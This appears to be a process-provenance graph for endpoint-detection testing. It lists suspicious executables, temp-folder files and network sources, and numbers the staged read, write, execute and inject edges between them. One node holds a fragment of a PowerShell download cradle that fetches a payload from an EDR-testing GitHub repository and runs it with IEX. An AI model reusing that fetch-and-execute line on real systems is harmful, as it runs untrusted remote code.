16
MP*-EFT Remittance copy.exe 
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test
MF-C:\Users\admin\AppData\Local\Temp\EBDE
MP-secedit.exe
MF-C:\Program Files\Hantek2xx2\Driver\Win10\Hantek2D42IA64.sys
SF-C:\Users\Public\audiodg
MF-C:\Users\admin\AppData\Local\Temp\EasyValorant
TP*-MicrosoftEdgeUpdate.exe 
TP*-MsiExec.exe
MP*-regasm.exe
MF-EXa1124.1829\School_Project.exe
MF-C:\Program files\appdata\roaming\battery\battery.cmd
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-WISPTIS.EXE
MP-ROUTE.EXE
TP-360TS_Setup_Mini_WW.OG.CPI202304_6.6.0.1054.exe
44
0 1 ST-1
0 2 WR-1
0 3 FR-1
1 3 RF-1
3 2 UK-1
0 4 RD-1
0 5 EX-1
0 6 WR-1
0 7 IJ-1
7 1 ST-2
7 4 WR-2
7 5 RD-2
7 6 WR-2
0 8 FR-1
1 8 RF-1
8 4 RD-3
8 5 CD-3
8 6 WR-3
7 8 UK-2
0 9 FR-1
9 1 ST-4
9 4 EX-4
9 5 WR-4
9 6 EX-4
0 10 WR-1
9 10 WR-4
9 11 RD-4
9 12 ST-4
13 4 RD-4
13 5 WR-4
13 6 RD-4
9 13 UK-4
14 4 WR-4
14 5 RD-4
14 6 WR-4
14 10 WR-4
14 11 WR-4
14 12 ST-4
15 5 WR-4
15 6 WR-4
15 10 WR-4
15 11 WR-4
12 15 RF-4
14 15 UK-4

